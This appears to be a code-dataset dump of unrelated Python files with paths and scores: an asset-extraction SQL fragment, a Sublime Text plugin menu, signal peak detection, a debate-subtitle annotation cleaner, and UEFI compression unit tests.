WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
AND (eventsource_location_hostname is not NULL OR eventsource_location_ip is not NULL) AND sys_org is not NULL
UNION
SELECT source_fqdn as fqdn, source_hostname as hostname, source_ip as ip, sys_org as organization,
'' as title, false as is_collector,
source_enrichment_isnetworklocal as isnetworklocal, true as is_source, false as is_eventsource
FROM {"normalized"}
WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
AND (source_hostname is not NULL OR source_ip is not NULL) AND sys_org is not NULL
UNION
SELECT destination_fqdn as fqdn, destination_hostname as hostname, destination_ip as ip, sys_org as organization,
'' as title, false as is_collector,
false as isnetworklocal, false as is_source, false as is_eventsource
FROM {"normalized"}
WHERE sys_day=%(extraction_start_day)s AND sys_month=%(extraction_start_month)s AND sys_year=%(extraction_start_year)s
AND (destination_hostname is not NULL OR destination_ip is not NULL) AND sys_org is not NULL
AND destination_enrichment_isnetworklocal=true
""",
parameters={'extraction_start_year': sys_date["sys_year"],
'extraction_start_month': sys_date["sys_month"],
'extraction_start_day': sys_date["sys_day"]}
)
raws = cursor.fetchall()
fields = [field[0].split('.')[1] for field in cursor.description]
assets = []
logging.info("Size of data extracted from the hive: %d", len(raws))
for raw in raws:
asset = dict(zip(fields, raw))
assets.append(asset)
cursor.close()
return assets, sys_date | 0.24899 | 0.05621 |
from .pepper import *
from .pepper_launch import *
from .pepper_quit import *
from .pepper_autocomplete import *
class PepperMainMenuCommand(sublime_plugin.ApplicationCommand):
def run(self):
main_menu_commands = [
PepperLaunchCommand,
PepperAutocomplete,
PepperQuitCommand
]
def filter_visible(cmd):
if not isinstance(cmd, tuple):
if cmd.visible():
return cmd
else:
return None
name, desc, submenu = cmd
submenu = [filter_visible(c) for c in submenu
if filter_visible(c)]
if submenu:
return name, desc, submenu
return None
main_menu_commands = [filter_visible(c) for c in main_menu_commands
if filter_visible(c)]
def select_command_func(commands):
def select_command(i):
if i < 0:
return
command = commands[i]
if isinstance(command, tuple):
name, desc, l = command
@async
def quick_panel():
sublime.active_window().show_quick_panel([
[command_name(item)] +
command_description(item).split("\n")
for item in l
], select_command_func(l))
quick_panel()
else:
cmd = command_str(command)
if issubclass(command, sublime_plugin.ApplicationCommand):
sublime.run_command(cmd)
elif issubclass(command, sublime_plugin.WindowCommand):
sublime.active_window().run_command(cmd)
elif issubclass(command, sublime_plugin.TextCommand):
sublime.active_window().active_view().run_command(cmd)
return select_command
def command_str(cls):
name = cls.__name__
return "pepper_" + name[18:-7].lower()
def command_name(cls):
if isinstance(cls, tuple):
name, desc, l = cls
return name
return cls.plugin_name
def command_description(cls):
if isinstance(cls, tuple):
name, desc, l = cls
return desc
return cls.plugin_description
sublime.active_window().show_quick_panel([
[command_name(cls)] + command_description(cls).split("\n")
for cls in main_menu_commands
], select_command_func(main_menu_commands)) | pepper_main_menu.py | from .pepper import *
from .pepper_launch import *
from .pepper_quit import *
from .pepper_autocomplete import *
class PepperMainMenuCommand(sublime_plugin.ApplicationCommand):
def run(self):
main_menu_commands = [
PepperLaunchCommand,
PepperAutocomplete,
PepperQuitCommand
]
def filter_visible(cmd):
if not isinstance(cmd, tuple):
if cmd.visible():
return cmd
else:
return None
name, desc, submenu = cmd
submenu = [filter_visible(c) for c in submenu
if filter_visible(c)]
if submenu:
return name, desc, submenu
return None
main_menu_commands = [filter_visible(c) for c in main_menu_commands
if filter_visible(c)]
def select_command_func(commands):
def select_command(i):
if i < 0:
return
command = commands[i]
if isinstance(command, tuple):
name, desc, l = command
@async
def quick_panel():
sublime.active_window().show_quick_panel([
[command_name(item)] +
command_description(item).split("\n")
for item in l
], select_command_func(l))
quick_panel()
else:
cmd = command_str(command)
if issubclass(command, sublime_plugin.ApplicationCommand):
sublime.run_command(cmd)
elif issubclass(command, sublime_plugin.WindowCommand):
sublime.active_window().run_command(cmd)
elif issubclass(command, sublime_plugin.TextCommand):
sublime.active_window().active_view().run_command(cmd)
return select_command
def command_str(cls):
name = cls.__name__
return "pepper_" + name[18:-7].lower()
def command_name(cls):
if isinstance(cls, tuple):
name, desc, l = cls
return name
return cls.plugin_name
def command_description(cls):
if isinstance(cls, tuple):
name, desc, l = cls
return desc
return cls.plugin_description
sublime.active_window().show_quick_panel([
[command_name(cls)] + command_description(cls).split("\n")
for cls in main_menu_commands
], select_command_func(main_menu_commands)) | 0.308607 | 0.04703 |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
def split(
df, cmpframe=0, distfactor=1.5, show=False, add_start=False, add_end=False
):
if cmpframe == -1:
start = df[-2:-1]
else:
start = df[cmpframe : cmpframe + 1]
d = dist(start, df).sum(axis=1)
valleys = find_splits(d, distfactor)
if add_start:
valleys = np.append([0], valleys)
if add_end:
valleys = np.append(valleys, [len(df) - 1])
if show:
plt.figure(figsize=(10, 4))
plt.plot(d)
for v in valleys:
plt.axvline(v, c="red")
plt.show()
return [df[a:b] for a, b in zip(valleys[:-1], valleys[1:])]
def signal_of_split(
df, cmpframe=0, distfactor=1.5, show=False, add_start=False, add_end=False
):
if cmpframe == -1:
start = df[-2:-1]
else:
start = df[cmpframe : cmpframe + 1]
d = dist(start, df).sum(axis=1)
valleys = find_splits(d, distfactor)
if add_start:
valleys = np.append([0], valleys)
if add_end:
valleys = np.append(valleys, [len(df) - 1])
return d, valleys
def dist(start, df):
diffdf = pd.DataFrame()
for c in df.columns:
diffdf[c] = (df[c] - start[c].values) ** 2
return diffdf
def get_frequency(signal):
ft = np.fft.fft(signal)
ftabs = np.abs(ft)
ftabs[0] = 0
return np.argmax(ftabs[1:20])
def find_splits(signal, distfactor=1.5):
splitsnb_estimate = get_frequency(signal)
# print(splitsnb_estimate)
mph = np.mean(-signal)
mpd = len(signal) / (distfactor * splitsnb_estimate)
valleys = _detect_peaks(signal, mpd=mpd, mph=mph, valley=True)
return valleys
def _detect_peaks(
x,
mph=None,
mpd=1,
threshold=0,
edge="rising",
kpsh=False,
valley=False,
show=False,
ax=None,
):
"""Detect peaks in data based on their amplitude and other features.
Parameters
----------
x : 1D array_like
data.
mph : {None, number}, optional (default = None)
detect peaks that are greater than minimum peak height.
mpd : positive integer, optional (default = 1)
detect peaks that are at least separated
by minimum peak distance (in
number of data).
valley : bool, optional (default = False)
if True (1), detect valleys (local minima) instead of peaks.
show : bool, optional (default = False)
if True (1), plot data in matplotlib figure.
ax : a matplotlib.axes.Axes instance, optional (default = None).
Returns
-------
ind : 1D array_like
indeces of the peaks in `x`.
Notes
-----
The detection of valleys instead of peaks
is performed internally by simply
negating the data: `ind_valleys = detect_peaks(-x)`
"""
x = np.atleast_1d(x).astype("float64")
if x.size < 3:
return np.array([], dtype=int)
if valley:
x = -x
# find indices of all peaks
dx = x[1:] - x[:-1]
# handle NaN's
indnan = np.where(np.isnan(x))[0]
if indnan.size:
x[indnan] = np.inf
dx[np.where(np.isnan(dx))[0]] = np.inf
ine, ire, ife = np.array([[], [], []], dtype=int)
if not edge:
ine = np.where((np.hstack((dx, 0)) < 0) & (np.hstack((0, dx)) > 0))[0]
else:
if edge.lower() in ["rising", "both"]:
ire = np.where(
(np.hstack((dx, 0)) <= 0) & (np.hstack((0, dx)) > 0)
)[0]
if edge.lower() in ["falling", "both"]:
ife = np.where(
(np.hstack((dx, 0)) < 0) & (np.hstack((0, dx)) >= 0)
)[0]
ind = np.unique(np.hstack((ine, ire, ife)))
# handle NaN's
if ind.size and indnan.size:
# NaN's and values close to NaN's cannot be peaks
ind = ind[
np.in1d(
ind,
np.unique(np.hstack((indnan, indnan - 1, indnan + 1))),
invert=True,
)
]
# first and last values of x cannot be peaks
if ind.size and ind[0] == 0:
ind = ind[1:]
if ind.size and ind[-1] == x.size - 1:
ind = ind[:-1]
# remove peaks < minimum peak height
if ind.size and mph is not None:
ind = ind[x[ind] >= mph]
# remove peaks - neighbors < threshold
if ind.size and threshold > 0:
dx = np.min(
np.vstack([x[ind] - x[ind - 1], x[ind] - x[ind + 1]]), axis=0
)
ind = np.delete(ind, np.where(dx < threshold)[0])
# detect small peaks closer than minimum peak distance
if ind.size and mpd > 1:
ind = ind[np.argsort(x[ind])][::-1] # sort ind by peak height
idel = np.zeros(ind.size, dtype=bool)
for i in range(ind.size):
if not idel[i]:
# keep peaks with the same height if kpsh is True
idel = idel | (ind >= ind[i] - mpd) & (ind <= ind[i] + mpd) & (
x[ind[i]] > x[ind] if kpsh else True
)
idel[i] = 0 # Keep current peak
# remove the small peaks and sort back the indices by their occurrence
ind = np.sort(ind[~idel])
return ind | src/data/split.py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
def split(
df, cmpframe=0, distfactor=1.5, show=False, add_start=False, add_end=False
):
if cmpframe == -1:
start = df[-2:-1]
else:
start = df[cmpframe : cmpframe + 1]
d = dist(start, df).sum(axis=1)
valleys = find_splits(d, distfactor)
if add_start:
valleys = np.append([0], valleys)
if add_end:
valleys = np.append(valleys, [len(df) - 1])
if show:
plt.figure(figsize=(10, 4))
plt.plot(d)
for v in valleys:
plt.axvline(v, c="red")
plt.show()
return [df[a:b] for a, b in zip(valleys[:-1], valleys[1:])]
def signal_of_split(
df, cmpframe=0, distfactor=1.5, show=False, add_start=False, add_end=False
):
if cmpframe == -1:
start = df[-2:-1]
else:
start = df[cmpframe : cmpframe + 1]
d = dist(start, df).sum(axis=1)
valleys = find_splits(d, distfactor)
if add_start:
valleys = np.append([0], valleys)
if add_end:
valleys = np.append(valleys, [len(df) - 1])
return d, valleys
def dist(start, df):
diffdf = pd.DataFrame()
for c in df.columns:
diffdf[c] = (df[c] - start[c].values) ** 2
return diffdf
def get_frequency(signal):
ft = np.fft.fft(signal)
ftabs = np.abs(ft)
ftabs[0] = 0
return np.argmax(ftabs[1:20])
def find_splits(signal, distfactor=1.5):
splitsnb_estimate = get_frequency(signal)
# print(splitsnb_estimate)
mph = np.mean(-signal)
mpd = len(signal) / (distfactor * splitsnb_estimate)
valleys = _detect_peaks(signal, mpd=mpd, mph=mph, valley=True)
return valleys
def _detect_peaks(
x,
mph=None,
mpd=1,
threshold=0,
edge="rising",
kpsh=False,
valley=False,
show=False,
ax=None,
):
"""Detect peaks in data based on their amplitude and other features.
Parameters
----------
x : 1D array_like
data.
mph : {None, number}, optional (default = None)
detect peaks that are greater than minimum peak height.
mpd : positive integer, optional (default = 1)
detect peaks that are at least separated
by minimum peak distance (in
number of data).
valley : bool, optional (default = False)
if True (1), detect valleys (local minima) instead of peaks.
show : bool, optional (default = False)
if True (1), plot data in matplotlib figure.
ax : a matplotlib.axes.Axes instance, optional (default = None).
Returns
-------
ind : 1D array_like
indeces of the peaks in `x`.
Notes
-----
The detection of valleys instead of peaks
is performed internally by simply
negating the data: `ind_valleys = detect_peaks(-x)`
"""
x = np.atleast_1d(x).astype("float64")
if x.size < 3:
return np.array([], dtype=int)
if valley:
x = -x
# find indices of all peaks
dx = x[1:] - x[:-1]
# handle NaN's
indnan = np.where(np.isnan(x))[0]
if indnan.size:
x[indnan] = np.inf
dx[np.where(np.isnan(dx))[0]] = np.inf
ine, ire, ife = np.array([[], [], []], dtype=int)
if not edge:
ine = np.where((np.hstack((dx, 0)) < 0) & (np.hstack((0, dx)) > 0))[0]
else:
if edge.lower() in ["rising", "both"]:
ire = np.where(
(np.hstack((dx, 0)) <= 0) & (np.hstack((0, dx)) > 0)
)[0]
if edge.lower() in ["falling", "both"]:
ife = np.where(
(np.hstack((dx, 0)) < 0) & (np.hstack((0, dx)) >= 0)
)[0]
ind = np.unique(np.hstack((ine, ire, ife)))
# handle NaN's
if ind.size and indnan.size:
# NaN's and values close to NaN's cannot be peaks
ind = ind[
np.in1d(
ind,
np.unique(np.hstack((indnan, indnan - 1, indnan + 1))),
invert=True,
)
]
# first and last values of x cannot be peaks
if ind.size and ind[0] == 0:
ind = ind[1:]
if ind.size and ind[-1] == x.size - 1:
ind = ind[:-1]
# remove peaks < minimum peak height
if ind.size and mph is not None:
ind = ind[x[ind] >= mph]
# remove peaks - neighbors < threshold
if ind.size and threshold > 0:
dx = np.min(
np.vstack([x[ind] - x[ind - 1], x[ind] - x[ind + 1]]), axis=0
)
ind = np.delete(ind, np.where(dx < threshold)[0])
# detect small peaks closer than minimum peak distance
if ind.size and mpd > 1:
ind = ind[np.argsort(x[ind])][::-1] # sort ind by peak height
idel = np.zeros(ind.size, dtype=bool)
for i in range(ind.size):
if not idel[i]:
# keep peaks with the same height if kpsh is True
idel = idel | (ind >= ind[i] - mpd) & (ind <= ind[i] + mpd) & (
x[ind[i]] > x[ind] if kpsh else True
)
idel[i] = 0 # Keep current peak
# remove the small peaks and sort back the indices by their occurrence
ind = np.sort(ind[~idel])
return ind | 0.513912 | 0.597197 |
import os
import re
import numpy as np
class DebattenAnnotatedDatacleaner:
"""
Takes the annotated programs, ...
"""
# Initialises class and input, output locations
def __init__(self, loc_ann=None, loc_out=None):
self.loc_ann_subtitles = loc_ann if loc_ann is not None else []
self.loc_out_subtitles = loc_out if loc_out is not None else []
def setAnnotatedFilesLocation(self, new_loc):
self.loc_ann_subtitles = new_loc
def setOutputFilesLocation(self, new_loc):
self.loc_out_subtitles = new_loc
def getFileLocation(self, disp=True):
if disp:
if not self.loc_ann_subtitles:
print('Annotated subtitles are not specified!')
else:
print('Annotated subtitles are loaded from "{:s}"'.format(self.loc_ann_subtitles))
if not self.loc_out_subtitles:
print('Save location is not specified!')
else:
print('Save location is "{:s}"'.format(self.loc_out_subtitles))
return self.loc_ann_subtitles, self.loc_out_subtitles
def getFilePaths(self):
files = os.listdir(self.loc_ann_subtitles)
return [self.loc_ann_subtitles+f for f in files]
def getProgramAndSentences(self,f_path):
"""Gets the program id, sentences id and sentences from a document"""
with open(f_path,'r') as f:
doc = f.read()
#Find program id
m_program_id = re.compile('program[\d]+')
m = re.search(m_program_id, doc)
program_id = m.group()
sentences = doc.split('<p ')
m_sentence_id = re.compile('id="[\d]+">')
# Finds the sentence ids and removes html stuff from the begining of each sentence
sentences_id = []
for i in range(len(sentences)):
match = re.search(m_sentence_id, sentences[i])
if not match:
sentences[i] = None
else:
sentences_id.append(int(match.group()[4:-2]))
start_from = sentences[i].find('>')+1
sentences[i] = sentences[i][start_from:]
sentences = list(filter(None, sentences)) # Remove None elements
assert(len(sentences)==len(sentences_id))
return program_id, sentences_id, sentences
# Finds highligted text including its surrounding patttern
def findHighlights(self,s):
m_highlight = re.compile('<span id="highlight["\w\d ]+class="highlight[\w"]+>[\w\d. ,!?%]+</span>')
return re.findall(m_highlight, s)
# Extracts highlighted text only
def extractHighlights(self, s_matches):#Extracted the text highlighted
m_high_text = re.compile('">[\w\d ,.!?%]+</')
high_text = [re.findall(m_high_text, s_matches[i])[0][2:-2] for i in range(len(s_matches))]
return [s.lstrip().rstrip() for s in high_text]
# Removes html tags (and crap) from the string.
def cleanSentence(self, s, disp=False):
m_crap = re.compile('<[\w\d "=/]+>')
s_crap_free = s
for pattern in re.findall(m_crap, s):
if disp: print(pattern)
s_crap_free = s_crap_free.replace(pattern,'')
#s_crap_free = re.sub('id="[\d]+">','',s_crap_free) # only during dev
s_crap_free = s_crap_free.replace('\t',' ') # removes tabs
s_crap_free = re.sub(' +',' ', s_crap_free) # removes excess spaces
return s_crap_free.lstrip().rstrip()
def getHighlight_indices(self,s,s_highlighted):
# Two heuristic for correcting partially highlighted words.
def getLeadingSpace(s,start_idx):
# Finds first leading space before index "start_idx" in s
if start_idx < 0:
return 0
elif s[start_idx] is ' ' :
return start_idx+1
else:
return getLeadingSpace(s,start_idx-1)
def getTailingSpace(s,end_idx):
# Finds first trailing space after index "end_idx" in s
if end_idx >= len(s):
return len(s)
elif s[end_idx] is ' ' or end_idx == len(s):
return end_idx
else:
return getTailingSpace(s,end_idx+1)
# Find the indicies of highlighted words
indices = []
# Get matched indices
for m in s_highlighted:
m_pattern = re.compile(m)
match = re.search(m_pattern, s)
if match:
indices.append([getLeadingSpace(s, match.start()),
getTailingSpace(s, match.end())])
else:
print(match)
print(m)
print(s_highlighted)
print(s+'\n')
#print('\n\n')
return indices
def getCleanedProgramSentences(self, sentences):
sentences_processed = [None]*len(sentences)
sentences_highlight = [None]*len(sentences)
sentences_highlight_ind = [None]*len(sentences)
for i in range(len(sentences)):
sen = sentences[i]
raw_highlights = self.findHighlights(sen)
text_highlights = self.extractHighlights(raw_highlights)
#Crap free verion
sentences_processed[i] = self.cleanSentence(sen)
#print('cleaned: '+sentences_processed[i])
indices_highlights = self.getHighlight_indices(sentences_processed[i],
text_highlights)
sentences_highlight_ind[i] = indices_highlights
for idx in indices_highlights:
if sentences_highlight[i]:
sentences_highlight[i] = sentences_highlight[i]+ ' [new claim]: '\
+sentences_processed[i][idx[0]:idx[1]]
else:
sentences_highlight[i] = sentences_processed[i][idx[0]:idx[1]]
return sentences_processed, sentences_highlight, sentences_highlight_ind
# EXPERIMENTAL!!! Processing multi-claim paragraphs
def processMultiClaim(self,s,idx):
merge_claims = []
for c in range(len(idx)-1):
if abs(idx[c][1]-idx[c+1][0]) == 1: #It is the same claim
merge_claims.append(True)
else:
merge_claims.append(False)
new_s = []
new_idx = []
for c in range(len(idx)-1):
if merge_claims[c]:
start_id = idx[c][0]
end_id = idx[c+1][1]
new_idx.append([start_id, end_id])
new_s.append(s[start_id:end_id])
else:
if c > 0:
new_s.append(' [new claim]: ')
start_id = idx[c][0]
end_id = idx[c][1]
new_idx.append([start_id, end_id])
new_s.append(s[start_id:end_id])
if not merge_claims[-1]:
new_s.append(' [new claim]: ')
start_id = idx[-1][0]
end_id = idx[-1][1]
new_idx.append([start_id, end_id])
new_s.append(s[start_id:end_id])
new_s = ''.join(new_s)
return new_s, new_idx
def getAllCleanedProgramSentences(self,disp=False):
file_paths = self.getFilePaths()
all_program_id = [None]*len(file_paths)
all_sentences = [None]*len(file_paths)
all_sentences_id = [None]*len(file_paths)
all_highlights = [None]*len(file_paths)
all_highlights_ind = [None]*len(file_paths)
total_claims = 0
total_sentences = 0
for f in range(len(file_paths)):
all_program_id[f], all_sentences_id[f], sentences = \
self.getProgramAndSentences(file_paths[f])
if disp: print('Program id {:s}'.format(all_program_id[f]))
all_sentences[f], all_highlights[f], all_highlights_ind[f] = \
self.getCleanedProgramSentences(sentences)
num_claims = len(list(filter(None,all_highlights[f])))
if disp: print('\tThere were {:d} claims out of {:d} sentences ({:2.2f}%)'.format(num_claims
,len(sentences), num_claims/float(len(sentences))*100))
total_claims = total_claims+num_claims
total_sentences = total_sentences + len(sentences)
if disp: print('\nIn total there were {:d} claims out of {:d} sentences ({:2.2f}%)'.format(total_claims
, total_sentences, total_claims/float(total_sentences)*100))
# ...
labels = ['program_id', 'sentence_id', 'sentence', 'claim_idx', 'claim']
data = [ [None]*len(labels) for i in range(total_sentences)]
i = 0
for p in range(len(all_program_id)):
for si in range(len(all_sentences[p])):
data[i][0] = all_program_id[p]
data[i][1] = all_sentences_id[p][si]
data[i][2] = all_sentences[p][si]
if len(all_highlights_ind[p][si]) == 1:
data[i][3] = all_highlights_ind[p][si]
data[i][4] = all_highlights[p][si]
elif all_highlights_ind[p][si]:
print('HELP')
print(all_program_id[p])
#print(all_sentences[p][si])
print(all_highlights_ind[p][si])
print(all_highlights[p][si])
new_s, new_idx = self.processMultiClaim(all_sentences[p][si],
all_highlights_ind[p][si])
print('Trying to handle this multi-claim, is the output correct?')
print(new_idx)
print(new_s)
print()
data[i][3] = new_idx
data[i][4] = new_s
i = i+1
return data, labels | util/DebattenAnnotatedDatacleaner.py | import os
import re
import numpy as np
class DebattenAnnotatedDatacleaner:
"""
Takes the annotated programs, ...
"""
# Initialises class and input, output locations
def __init__(self, loc_ann=None, loc_out=None):
self.loc_ann_subtitles = loc_ann if loc_ann is not None else []
self.loc_out_subtitles = loc_out if loc_out is not None else []
def setAnnotatedFilesLocation(self, new_loc):
self.loc_ann_subtitles = new_loc
def setOutputFilesLocation(self, new_loc):
self.loc_out_subtitles = new_loc
def getFileLocation(self, disp=True):
if disp:
if not self.loc_ann_subtitles:
print('Annotated subtitles are not specified!')
else:
print('Annotated subtitles are loaded from "{:s}"'.format(self.loc_ann_subtitles))
if not self.loc_out_subtitles:
print('Save location is not specified!')
else:
print('Save location is "{:s}"'.format(self.loc_out_subtitles))
return self.loc_ann_subtitles, self.loc_out_subtitles
def getFilePaths(self):
files = os.listdir(self.loc_ann_subtitles)
return [self.loc_ann_subtitles+f for f in files]
def getProgramAndSentences(self,f_path):
"""Gets the program id, sentences id and sentences from a document"""
with open(f_path,'r') as f:
doc = f.read()
#Find program id
m_program_id = re.compile('program[\d]+')
m = re.search(m_program_id, doc)
program_id = m.group()
sentences = doc.split('<p ')
m_sentence_id = re.compile('id="[\d]+">')
# Finds the sentence ids and removes html stuff from the begining of each sentence
sentences_id = []
for i in range(len(sentences)):
match = re.search(m_sentence_id, sentences[i])
if not match:
sentences[i] = None
else:
sentences_id.append(int(match.group()[4:-2]))
start_from = sentences[i].find('>')+1
sentences[i] = sentences[i][start_from:]
sentences = list(filter(None, sentences)) # Remove None elements
assert(len(sentences)==len(sentences_id))
return program_id, sentences_id, sentences
# Finds highligted text including its surrounding patttern
def findHighlights(self,s):
m_highlight = re.compile('<span id="highlight["\w\d ]+class="highlight[\w"]+>[\w\d. ,!?%]+</span>')
return re.findall(m_highlight, s)
# Extracts highlighted text only
def extractHighlights(self, s_matches):#Extracted the text highlighted
m_high_text = re.compile('">[\w\d ,.!?%]+</')
high_text = [re.findall(m_high_text, s_matches[i])[0][2:-2] for i in range(len(s_matches))]
return [s.lstrip().rstrip() for s in high_text]
# Removes html tags (and crap) from the string.
def cleanSentence(self, s, disp=False):
m_crap = re.compile('<[\w\d "=/]+>')
s_crap_free = s
for pattern in re.findall(m_crap, s):
if disp: print(pattern)
s_crap_free = s_crap_free.replace(pattern,'')
#s_crap_free = re.sub('id="[\d]+">','',s_crap_free) # only during dev
s_crap_free = s_crap_free.replace('\t',' ') # removes tabs
s_crap_free = re.sub(' +',' ', s_crap_free) # removes excess spaces
return s_crap_free.lstrip().rstrip()
def getHighlight_indices(self,s,s_highlighted):
# Two heuristic for correcting partially highlighted words.
def getLeadingSpace(s,start_idx):
# Finds first leading space before index "start_idx" in s
if start_idx < 0:
return 0
elif s[start_idx] is ' ' :
return start_idx+1
else:
return getLeadingSpace(s,start_idx-1)
def getTailingSpace(s,end_idx):
# Finds first trailing space after index "end_idx" in s
if end_idx >= len(s):
return len(s)
elif s[end_idx] is ' ' or end_idx == len(s):
return end_idx
else:
return getTailingSpace(s,end_idx+1)
# Find the indicies of highlighted words
indices = []
# Get matched indices
for m in s_highlighted:
m_pattern = re.compile(m)
match = re.search(m_pattern, s)
if match:
indices.append([getLeadingSpace(s, match.start()),
getTailingSpace(s, match.end())])
else:
print(match)
print(m)
print(s_highlighted)
print(s+'\n')
#print('\n\n')
return indices
def getCleanedProgramSentences(self, sentences):
sentences_processed = [None]*len(sentences)
sentences_highlight = [None]*len(sentences)
sentences_highlight_ind = [None]*len(sentences)
for i in range(len(sentences)):
sen = sentences[i]
raw_highlights = self.findHighlights(sen)
text_highlights = self.extractHighlights(raw_highlights)
#Crap free verion
sentences_processed[i] = self.cleanSentence(sen)
#print('cleaned: '+sentences_processed[i])
indices_highlights = self.getHighlight_indices(sentences_processed[i],
text_highlights)
sentences_highlight_ind[i] = indices_highlights
for idx in indices_highlights:
if sentences_highlight[i]:
sentences_highlight[i] = sentences_highlight[i]+ ' [new claim]: '\
+sentences_processed[i][idx[0]:idx[1]]
else:
sentences_highlight[i] = sentences_processed[i][idx[0]:idx[1]]
return sentences_processed, sentences_highlight, sentences_highlight_ind
# EXPERIMENTAL!!! Processing multi-claim paragraphs
def processMultiClaim(self,s,idx):
merge_claims = []
for c in range(len(idx)-1):
if abs(idx[c][1]-idx[c+1][0]) == 1: #It is the same claim
merge_claims.append(True)
else:
merge_claims.append(False)
new_s = []
new_idx = []
for c in range(len(idx)-1):
if merge_claims[c]:
start_id = idx[c][0]
end_id = idx[c+1][1]
new_idx.append([start_id, end_id])
new_s.append(s[start_id:end_id])
else:
if c > 0:
new_s.append(' [new claim]: ')
start_id = idx[c][0]
end_id = idx[c][1]
new_idx.append([start_id, end_id])
new_s.append(s[start_id:end_id])
if not merge_claims[-1]:
new_s.append(' [new claim]: ')
start_id = idx[-1][0]
end_id = idx[-1][1]
new_idx.append([start_id, end_id])
new_s.append(s[start_id:end_id])
new_s = ''.join(new_s)
return new_s, new_idx
def getAllCleanedProgramSentences(self,disp=False):
file_paths = self.getFilePaths()
all_program_id = [None]*len(file_paths)
all_sentences = [None]*len(file_paths)
all_sentences_id = [None]*len(file_paths)
all_highlights = [None]*len(file_paths)
all_highlights_ind = [None]*len(file_paths)
total_claims = 0
total_sentences = 0
for f in range(len(file_paths)):
all_program_id[f], all_sentences_id[f], sentences = \
self.getProgramAndSentences(file_paths[f])
if disp: print('Program id {:s}'.format(all_program_id[f]))
all_sentences[f], all_highlights[f], all_highlights_ind[f] = \
self.getCleanedProgramSentences(sentences)
num_claims = len(list(filter(None,all_highlights[f])))
if disp: print('\tThere were {:d} claims out of {:d} sentences ({:2.2f}%)'.format(num_claims
,len(sentences), num_claims/float(len(sentences))*100))
total_claims = total_claims+num_claims
total_sentences = total_sentences + len(sentences)
if disp: print('\nIn total there were {:d} claims out of {:d} sentences ({:2.2f}%)'.format(total_claims
, total_sentences, total_claims/float(total_sentences)*100))
# ...
labels = ['program_id', 'sentence_id', 'sentence', 'claim_idx', 'claim']
data = [ [None]*len(labels) for i in range(total_sentences)]
i = 0
for p in range(len(all_program_id)):
for si in range(len(all_sentences[p])):
data[i][0] = all_program_id[p]
data[i][1] = all_sentences_id[p][si]
data[i][2] = all_sentences[p][si]
if len(all_highlights_ind[p][si]) == 1:
data[i][3] = all_highlights_ind[p][si]
data[i][4] = all_highlights[p][si]
elif all_highlights_ind[p][si]:
print('HELP')
print(all_program_id[p])
#print(all_sentences[p][si])
print(all_highlights_ind[p][si])
print(all_highlights[p][si])
new_s, new_idx = self.processMultiClaim(all_sentences[p][si],
all_highlights_ind[p][si])
print('Trying to handle this multi-claim, is the output correct?')
print(new_idx)
print(new_s)
print()
data[i][3] = new_idx
data[i][4] = new_s
i = i+1
return data, labels | 0.248079 | 0.196209 |
import unittest
import struct
from uefi_firmware import efi_compressor
class CompressionTest(unittest.TestCase):
def _test_compress(self, compress_algorithm):
default_buffer = b"AAAAAAAA" * 90
compressed_buffer = compress_algorithm(
default_buffer, len(default_buffer))
self.assertTrue(compressed_buffer is not None)
self.assertGreater(len(compressed_buffer), 8)
compressed_size, uncompressed_size = struct.unpack(
"<II", compressed_buffer[:8])
self.assertEqual(len(compressed_buffer) - 8, compressed_size)
def _test_decompress(self, compress_algorithm, decompress_algorithm):
default_buffer = b"AAAAAAAA" * 90
compressed_buffer = compress_algorithm(
default_buffer, len(default_buffer))
decompressed_buffer = decompress_algorithm(
compressed_buffer, len(compressed_buffer))
self.assertTrue(decompressed_buffer is not None)
self.assertEqual(len(decompressed_buffer), len(default_buffer))
self.assertEqual(decompressed_buffer, default_buffer)
def test_efi_compress(self):
self._test_compress(efi_compressor.EfiCompress)
def test_efi_decompress(self):
self._test_decompress(
efi_compressor.EfiCompress, efi_compressor.EfiDecompress)
def test_tiano_compress(self):
self._test_compress(efi_compressor.TianoCompress)
def test_tiano_decompress(self):
self._test_decompress(
efi_compressor.TianoCompress, efi_compressor.TianoDecompress)
def test_lzma_compress(self):
default_buffer = b"AAAAAAAA" * 90
compressed_buffer = efi_compressor.LzmaCompress(
default_buffer, len(default_buffer))
self.assertTrue(compressed_buffer is not None)
def test_lzma_decompress(self):
default_buffer = b"AAAAAAAA" * 90
compressed_buffer = efi_compressor.LzmaCompress(
default_buffer, len(default_buffer))
decompressed_buffer = efi_compressor.LzmaDecompress(
compressed_buffer,
len(compressed_buffer)
)
self.assertTrue(decompressed_buffer is not None)
self.assertEqual(len(decompressed_buffer), len(default_buffer))
self.assertEqual(decompressed_buffer, default_buffer)
if __name__ == '__main__':
unittest.main() | tests/test_compression.py | import unittest
import struct
from uefi_firmware import efi_compressor
class CompressionTest(unittest.TestCase):
def _test_compress(self, compress_algorithm):
default_buffer = b"AAAAAAAA" * 90
compressed_buffer = compress_algorithm(
default_buffer, len(default_buffer))
self.assertTrue(compressed_buffer is not None)
self.assertGreater(len(compressed_buffer), 8)
compressed_size, uncompressed_size = struct.unpack(
"<II", compressed_buffer[:8])
self.assertEqual(len(compressed_buffer) - 8, compressed_size)
def _test_decompress(self, compress_algorithm, decompress_algorithm):
default_buffer = b"AAAAAAAA" * 90
compressed_buffer = compress_algorithm(
default_buffer, len(default_buffer))
decompressed_buffer = decompress_algorithm(
compressed_buffer, len(compressed_buffer))
self.assertTrue(decompressed_buffer is not None)
self.assertEqual(len(decompressed_buffer), len(default_buffer))
self.assertEqual(decompressed_buffer, default_buffer)
def test_efi_compress(self):
self._test_compress(efi_compressor.EfiCompress)
def test_efi_decompress(self):
self._test_decompress(
efi_compressor.EfiCompress, efi_compressor.EfiDecompress)
def test_tiano_compress(self):
self._test_compress(efi_compressor.TianoCompress)
def test_tiano_decompress(self):
self._test_decompress(
efi_compressor.TianoCompress, efi_compressor.TianoDecompress)
def test_lzma_compress(self):
default_buffer = b"AAAAAAAA" * 90
compressed_buffer = efi_compressor.LzmaCompress(
default_buffer, len(default_buffer))
self.assertTrue(compressed_buffer is not None)
def test_lzma_decompress(self):
default_buffer = b"AAAAAAAA" * 90
compressed_buffer = efi_compressor.LzmaCompress(
default_buffer, len(default_buffer))
decompressed_buffer = efi_compressor.LzmaDecompress(
compressed_buffer,
len(compressed_buffer)
)
